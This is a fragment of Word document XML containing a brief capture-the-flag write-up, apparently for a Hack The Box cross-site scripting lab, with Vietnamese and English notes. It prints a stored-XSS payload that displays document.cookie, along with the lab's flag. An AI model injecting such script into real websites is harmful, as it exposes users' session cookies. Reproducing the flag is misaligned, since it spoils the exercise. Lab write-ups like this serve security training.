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1B64" w14:textId="335D2D4A" w:rsidR="000A0DAE" w:rsidRDefault="00EB68FC" w:rsidP="00EB68FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB68FC">
        <w:t>To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6208DDFA" w14:textId="359EC878" w:rsidR="00EB68FC" w:rsidRDefault="00EB68FC" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Truy cập trang web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D6435" w14:textId="1B9FC91A" w:rsidR="00EB68FC" w:rsidRDefault="00EB68FC" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF2AE8E" wp14:editId="55B443FF">
            <wp:extent cx="4876800" cy="1781175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1198581463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1463" name="Picture 1" descr="A screenshot of a to-do li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1B2" w14:textId="3A3ADE8E" w:rsidR="00B06DC8" w:rsidRDefault="00B06DC8" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58144BEE" w14:textId="34A86097" w:rsidR="00B06DC8" w:rsidRDefault="00B06DC8" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114FD88" w14:textId="2182B3AC" w:rsidR="00B06DC8" w:rsidRDefault="00825F8A" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B9053" w14:textId="5C78C9F3" w:rsidR="00EB68FC" w:rsidRDefault="00EB68FC" w:rsidP="00EB68FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB68FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="231918"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFBFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB68FC">
        <w:t>HTB{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB68FC">
        <w:t>570r3d_f0r_3v3ry0n3_70_533}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EB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1520"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48EA9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13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AE"/>
    <w:rsid w:val="000A0DAE"/>
    <w:rsid w:val="00825F8A"/>
    <w:rsid w:val="00A74E13"/>
    <w:rsid w:val="00B06DC8"/>
    <w:rsid w:val="00E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E66C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A5E0E6DD-6E8D-46DF-AF3F-C607D0DA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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-27T11:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-27T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>